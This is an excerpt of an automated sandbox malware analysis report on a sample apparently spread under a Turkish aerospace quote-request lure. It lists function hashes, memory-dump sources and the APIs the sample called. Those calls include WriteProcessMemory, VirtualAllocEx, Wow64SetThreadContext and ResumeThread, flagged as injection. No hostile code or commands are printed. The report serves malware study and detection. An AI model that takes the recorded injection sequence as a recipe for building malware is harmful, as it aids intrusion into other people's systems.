Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9169944feeb564528d1e2f9dc713628fed43430ac07c55f93ffcefc5d5b09030
Instruction ID: a2186a7f1c046e0ddcbad4c4c2456cd8ad6dd9a783b2f2d23a45db3fb2e6a9d9
Opcode Fuzzy Hash: 9169944feeb564528d1e2f9dc713628fed43430ac07c55f93ffcefc5d5b09030
Instruction Fuzzy Hash: 0BE02635DA53A7CBCB02E7F0AC040FEBB34ADD2221B08469BD4A137090EB302619C7A1

Function 02E228B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1516565cdf034b6e1b7aa5e623cbb9a42f35cc685b9ba079c9b37875b6ab7fd
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: b1516565cdf034b6e1b7aa5e623cbb9a42f35cc685b9ba079c9b37875b6ab7fd
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 02E2D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b656746047b71374aa59cc322e49f4f0eb15fd05a9b3745be2a005f602718e6d
Instruction ID: 250fd17c64f91761daa89f0a2a93bfc62e52a849ce21cc57426dc002b4790870
Opcode Fuzzy Hash: b656746047b71374aa59cc322e49f4f0eb15fd05a9b3745be2a005f602718e6d
Instruction Fuzzy Hash: 93D04235E84519CBCB20DFA9E9944DCBB71EB89321B10642BDA2AA3651D6305865CF11

Function 02E2AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb85ffa4b2b15f5554f2a0f133f113e44970bd3d24de228694052576ff49cb6
Instruction ID: 87909c1a33a666020a1f8a5e85a985348e5cfff3108e54675ed056871106ed1b
Opcode Fuzzy Hash: abb85ffa4b2b15f5554f2a0f133f113e44970bd3d24de228694052576ff49cb6
Instruction Fuzzy Hash: EDD0673AB40108AFCB049F99EC409DDF7B6FB98221B448526E915E3260C6319965DB50

Function 02E26748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52a58949899b99008416f72117c9ebd4542876901e58455493f6e5e3458afc3
Instruction ID: 75468f072dba17f52d7c7ea4065c8b6ea9bfa22946b362cb395ee26f2170935e
Opcode Fuzzy Hash: d52a58949899b99008416f72117c9ebd4542876901e58455493f6e5e3458afc3
Instruction Fuzzy Hash: D1C0223090030A8AC508FB35EC844153B2AE6C0600F409D28910A35148DFFC1C481680

Analysis Process: xSjByRHuwGV.exePID: 1936, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	89
Total number of Limit Nodes:	5

Executed Functions

Function 031BB3C1 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031BB626

Memory Dump Source

Source File: 0000000B.00000002.2226139040.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31b0000_xSjByRHuwGV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0a0a249f8cfa7d53d6fd20f82f021964df8e43660b448ca3264153a6dbe30da9
Instruction ID: 896018168b2e49c73855e1587f0bfcf11be45afcd5b668416ff0dee19c96f4c4
Opcode Fuzzy Hash: 0a0a249f8cfa7d53d6fd20f82f021964df8e43660b448ca3264153a6dbe30da9
Instruction Fuzzy Hash: BD813570A04B058FDB24DF29D45079ABBF5FF88310F04896EE58ADBA40DB74E805CB95

Function 031B44F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031B59C9

Memory Dump Source

Source File: 0000000B.00000002.2226139040.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31b0000_xSjByRHuwGV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 625b15db6aac520fa19efc2f2d88e8d3c7f2c8a9badc88e7133eb87069bec2d7
Instruction ID: 81bcc96750eaf6b3138e789bfd5a9d7baac32b999fe7f3e16726e3bc5ab582ce
Opcode Fuzzy Hash: 625b15db6aac520fa19efc2f2d88e8d3c7f2c8a9badc88e7133eb87069bec2d7
Instruction Fuzzy Hash: FE41C1B0C0071DCBDB24CFAAC9847DDBBB6BF49704F20806AD508AB251DBB56945CF90

Function 031B590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031B59C9

Memory Dump Source

Source File: 0000000B.00000002.2226139040.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31b0000_xSjByRHuwGV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ea100b75ce6fcfb0d85b0062b8542566cd50be4ce381ac71038d9c9c20663cd4
Instruction ID: 084e22877136594ed8db1761082bbdebdfc6e1937211e22e970cd6e084e54130
Opcode Fuzzy Hash: ea100b75ce6fcfb0d85b0062b8542566cd50be4ce381ac71038d9c9c20663cd4
Instruction Fuzzy Hash: FE41CEB0C0071DCBDB24CFA9C9857DEBBB6BF49714F24806AD808AB251DBB56945CF50

Function 058C4160 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 058C4221

Memory Dump Source

Source File: 0000000B.00000002.2233263835.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_58c0000_xSjByRHuwGV.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 36b8b9ca841d0d6a2b8d9ce9e52a5457d1a6afc283234ecbaa65f0e86f559647
Instruction ID: 2b0b66180424c76b4ac0c05cce81dff136ce7532bf9d2e00da2fa07de4ad4fea
Opcode Fuzzy Hash: 36b8b9ca841d0d6a2b8d9ce9e52a5457d1a6afc283234ecbaa65f0e86f559647
Instruction Fuzzy Hash: 054108B9900309CFDB14CF99C449AAABBF5FF88315F24849DD919AB321D774A845CFA0

Function 08F1FD58 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F1FDF0

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 908a738661b578764590229e4339b10576f4cbd5abc1e21117efdb48a70a8180
Instruction ID: 143266d29f9d1eb9fb47537f8e172cc10f590bb92872d6af7d76878453eda04b
Opcode Fuzzy Hash: 908a738661b578764590229e4339b10576f4cbd5abc1e21117efdb48a70a8180
Instruction Fuzzy Hash: 3A2115B19003499FDF10CFA9C885BEEBBF5FF48320F10842AE959A7240D7799951CBA5

Function 08F1F7C2 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F1F846

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c08d9ec89004883f7f8638bdcc2fb547a5d35e941352bf0eae9c26a09b308672
Instruction ID: a1e283c1d9cba1f60a24ae471d1486cffb0481d9a8d43217b11a1b8833ab4c81
Opcode Fuzzy Hash: c08d9ec89004883f7f8638bdcc2fb547a5d35e941352bf0eae9c26a09b308672
Instruction Fuzzy Hash: F92169B1D003099FDB10DFAAC485BEEBBF4EF99220F14842ED558A7241DB789544CFA1

Function 08F1FD60 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F1FDF0

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 85942d1d8e64ed959cdd257e64a00e6eaf012eb2e30b58abdbb2f77b96819c39
Instruction ID: d43e2344e490b50a883299894d4847d185227a7dc5af1ecbd0caf4053de22f12
Opcode Fuzzy Hash: 85942d1d8e64ed959cdd257e64a00e6eaf012eb2e30b58abdbb2f77b96819c39
Instruction Fuzzy Hash: F82126B19003499FDF10CFA9C881BEEBBF5FF48320F108429E919A7240C7789950CBA5

Function 031BB3B0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031BD586,?,?,?,?,?), ref: 031BDA4F

Memory Dump Source

Source File: 0000000B.00000002.2226139040.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31b0000_xSjByRHuwGV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8fb0d457f154348a53c3629fae374a80f94dfe82387b4b52bb75b8264c23ae5a
Instruction ID: c0f82d63b231bd6476d67cf2ab862757d498d5cc414888752138054f644185e9
Opcode Fuzzy Hash: 8fb0d457f154348a53c3629fae374a80f94dfe82387b4b52bb75b8264c23ae5a
Instruction Fuzzy Hash: A821E5B5904209EFDB10CFAAD584ADEBFF4EB48320F14841AE914B3350D374A954CFA1

Function 08F1FE50 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F1FED0

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3836253a2297543de6ec9cef6f3e6a9746fb3a4df600d912908e8ba51ef9b655
Instruction ID: c28c31f8f1eec80309ec4edc7f11d40963d889d3696bfa2ef43f51a389ce3142
Opcode Fuzzy Hash: 3836253a2297543de6ec9cef6f3e6a9746fb3a4df600d912908e8ba51ef9b655
Instruction Fuzzy Hash: A52116B19003499FDF10CFAAC881AEEBBF5FF48320F108429E519A7240C7789510CBA5

Function 08F1FE48 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08F1FED0

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 91554eb20ac8cefae0e04541e607f8e8a5550b719e89267751b5db7ceeae6110
Instruction ID: c05818ff591d09e3d77ad393f3e940f671f3e3e40a1a74873c2b54ab46e2c85f
Opcode Fuzzy Hash: 91554eb20ac8cefae0e04541e607f8e8a5550b719e89267751b5db7ceeae6110
Instruction Fuzzy Hash: 562103B2D003499FDF10DFAAC981BEEBBF5BF48320F14842AE559A7240D77895109BA1

Function 08F1F7C8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F1F846

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 21e8fd3ea8154279d57ee20e128802c2286b848dc4d609f446e048c22b080cc0
Instruction ID: 9d0ebc6ed33d69f1f9d3315a979ac35ad9b412ed9a3873ab65a323cdcce6228c
Opcode Fuzzy Hash: 21e8fd3ea8154279d57ee20e128802c2286b848dc4d609f446e048c22b080cc0
Instruction Fuzzy Hash: BA21E871D003099FDB10DFAAC485BAEBBF4EF88324F14842DD559A7241DB78A944CFA5

Function 031BD9C1 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031BD586,?,?,?,?,?), ref: 031BDA4F

Memory Dump Source

Source File: 0000000B.00000002.2226139040.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31b0000_xSjByRHuwGV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c62fca98541cfeef88a25225cb04eb5a073f73f56437b71c2f71857620b8e364
Instruction ID: 92dfa3a218c9fc15566441687d0058a1784e6b2088735b80e0073d28469773fd
Opcode Fuzzy Hash: c62fca98541cfeef88a25225cb04eb5a073f73f56437b71c2f71857620b8e364
Instruction Fuzzy Hash: 8E21E3B5900249DFDB10CFA9D584ADEBFF4AB48320F14841AE918A3250D378A954CF61

Function 08F1F89A Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F1F90E

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3ffee3283ea2328dadda05f726111514394c7ae5ebd5c59dfcad7c1e3ad54923
Instruction ID: 7ca8f07e0b5cce8ad37f8cf9b973efade78bc581aaa155c2b0fd3027393b55a7
Opcode Fuzzy Hash: 3ffee3283ea2328dadda05f726111514394c7ae5ebd5c59dfcad7c1e3ad54923
Instruction Fuzzy Hash: E81156729003499FDF20DFAAC844BDFBBF5EF88320F148819E519A7250CB75A550CBA1

Function 08F1F8A0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F1F90E

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 11a44855eaac19205dbc983c9b0bf0efedfe187e6e4909b39d88377ab6984c9d
Instruction ID: e2002e2563a42e9213a242c7b7ce4e23480fc33c309957da5e0571c54c10a6fd
Opcode Fuzzy Hash: 11a44855eaac19205dbc983c9b0bf0efedfe187e6e4909b39d88377ab6984c9d
Instruction Fuzzy Hash: 0C1126729002499FDF10DFAAC845BDEBBF5EF88324F148819E519A7250CB75A550CBA1

Function 08F1F2D8 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 08F1F342

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5e7984f3bc00da70b012ffb6350bcc1eac121f19a2db68702fa49f5f08c3c970
Instruction ID: 5c5cc2dc432f254546b1f6fadb0c364d1bd66bf567dd4d05df601348b2a19f18
Opcode Fuzzy Hash: 5e7984f3bc00da70b012ffb6350bcc1eac121f19a2db68702fa49f5f08c3c970
Instruction Fuzzy Hash: 881128B2D0034A8FDB20DFAAC84579EFBF4EF88624F248419D519A7250CB79A544CBA5

Function 08F1F2E0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08F1F342

Memory Dump Source

Source File: 0000000B.00000002.2235540728.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f10000_xSjByRHuwGV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ec2fcbf638af1da811ceeb1fa87fc3758bcbb2763982e30586bd378363bb9e88
Instruction ID: 42a1b1e0142d1e389ca2532f9277d9ae32ad878ff8661f603b6228fdf92291ec
Opcode Fuzzy Hash: ec2fcbf638af1da811ceeb1fa87fc3758bcbb2763982e30586bd378363bb9e88
Instruction Fuzzy Hash: B51106B1D003498FDB20DFAAC44579EFBF5EF88724F248429D519A7240CB79A944CFA5

Function 031BB5C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031BB626

Memory Dump Source

Source File: 0000000B.00000002.2226139040.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31b0000_xSjByRHuwGV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 07eea871a7b25a6f44e0b54e5b28c36f9e0e86bb76787aa450ac6c8ad3417815
Instruction ID: 858e91acc09ac6c4403ebc1f51230ff097f0330bb18ce835bbb92f7910ffc06c
Opcode Fuzzy Hash: 07eea871a7b25a6f44e0b54e5b28c36f9e0e86bb76787aa450ac6c8ad3417815
Instruction Fuzzy Hash: 7A110FB6C043498FDB10CF9AD444ADEFBF4AF88320F14842AD418B7600D3B9A545CFA1

Function 016FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225198326.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_16fd000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d38221bf4626e8006cc8a90fcf8cf5063a2fbdc5f0eb5c8dc15fdaad636f8782
Instruction ID: d13d8c1d2c28a765e72eb1ffa54ff6a2dc1231cd831aa263e0234b99b589202d
Opcode Fuzzy Hash: d38221bf4626e8006cc8a90fcf8cf5063a2fbdc5f0eb5c8dc15fdaad636f8782
Instruction Fuzzy Hash: D92125B2504244EFDB05DF58DDC4B2ABF65FB88318F20C56DEA090B256C336E456CAA2

Function 016FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225198326.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_16fd000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd7810142c09843413c6f3c3d02965657702bc2b878f1b96f748058105fb450
Instruction ID: 673669b329a5d4d2a8b99242814652d4d08056e3e935d84fc49399830fbb382a
Opcode Fuzzy Hash: 7dd7810142c09843413c6f3c3d02965657702bc2b878f1b96f748058105fb450
Instruction Fuzzy Hash: 50210676504204EFDB05DF54DDC0B6ABF65FB84324F20C16DDA0A0B256C336F456CAA1

Function 0170D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225293700.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_170d000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d11841c9b3119a4213e186c68290e9bd489f7f23b1d194158b7b1d5e24af14
Instruction ID: 57f94e02be19d4454c5c551040bcd119f505d1564eed2f65ca7c9ba5131481fe
Opcode Fuzzy Hash: 48d11841c9b3119a4213e186c68290e9bd489f7f23b1d194158b7b1d5e24af14
Instruction Fuzzy Hash: F7213771508300EFDB26DFD4D5C0B25FBA1FB84324F20C5ADE9094B292C776D406CA61

Function 0170D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225293700.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_170d000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f77103e0481c5ff75b956e5fc3ef1845448b121f05033cf0c133758d334bbca6
Instruction ID: 2c4735b9f09c8875cf54bcc83d2c7fd67691b82e31e36c0529ca648eabe050c0
Opcode Fuzzy Hash: f77103e0481c5ff75b956e5fc3ef1845448b121f05033cf0c133758d334bbca6
Instruction Fuzzy Hash: 2C210375604304EFDB26DF94D9C0B26FBA5EB84314F20C5ADD90E4B292C376D406CA61

Function 016FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225198326.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_16fd000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 1d92c5f451658d02dae7b948f0d97a772406715e86bc648c61ae422f8665eab9
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 8711DFB6404280CFCB02CF54D9C4B1ABF71FB84318F24C6ADD9090B256C33AE45ACBA2

Function 016FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225198326.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_16fd000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 86d2e6e84458819c98d35289fbdfe671bdbfead0bd7b7d4c97204bd9acee3de8
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 7311CDB6404280DFCB02CF44D9C0B56BF61FB84224F2482A9D9090A656C33AE456CBA2

Function 0170D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225293700.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_170d000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 08392473a07f23385a46e3a9412a3ce1416213a89b6d976ad81d57857e462b2e
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 5E11BE75504384CFCB12CF54D5C4B15FBA1FB44314F24C6A9D8094B696C33AD40ACB62

Function 0170D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2225293700.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_170d000_xSjByRHuwGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 1c8ceb0935045408c7c9db2003bd4a60fe040c52b16d2ad918b773b9a512a1a5
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 9F11BB75508380DFCB12CF98C5C0B15FBA1FB84224F24C6A9D8494B6A6C33AD40ACB61

Analysis Process: xSjByRHuwGV.exePID: 5560, Parent PID: 1936COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.8%
Total number of Nodes:	47
Total number of Limit Nodes:	8

Executed Functions

Function 06D19548 Relevance: 3.4, APIs: 2, Instructions: 357
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D195E0

Memory Dump Source

Source File: 0000000F.00000002.3401181153.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6d10000_xSjByRHuwGV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d25e32b8257b0f191203287f497c63630ef0449e47b2f45fa6f0fa713bae5630
Instruction ID: e8af7d18c265e4c5dd420c2b5ddac97986f86fad905a20de9ca7886b85fb200d
Opcode Fuzzy Hash: d25e32b8257b0f191203287f497c63630ef0449e47b2f45fa6f0fa713bae5630
Instruction Fuzzy Hash: 52F10574E00218DFDB54CFA9D894B9DFBB2BF88300F1482A9D848AB355DB759986CF50

Function 06D19328 Relevance: 1.8, APIs: 1, Instructions: 262
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06D195E0

Memory Dump Source

Source File: 0000000F.00000002.3401181153.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6d10000_xSjByRHuwGV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71023555225e6c7daf9ddbc02aa9c2e32cefb755c00549a31410a18cf9dd548c
Instruction ID: 6fd898b931be588d02a53a23c9ecf7018b3da3a39acea8fcfdab7e6698ce549d
Opcode Fuzzy Hash: 71023555225e6c7daf9ddbc02aa9c2e32cefb755c00549a31410a18cf9dd548c
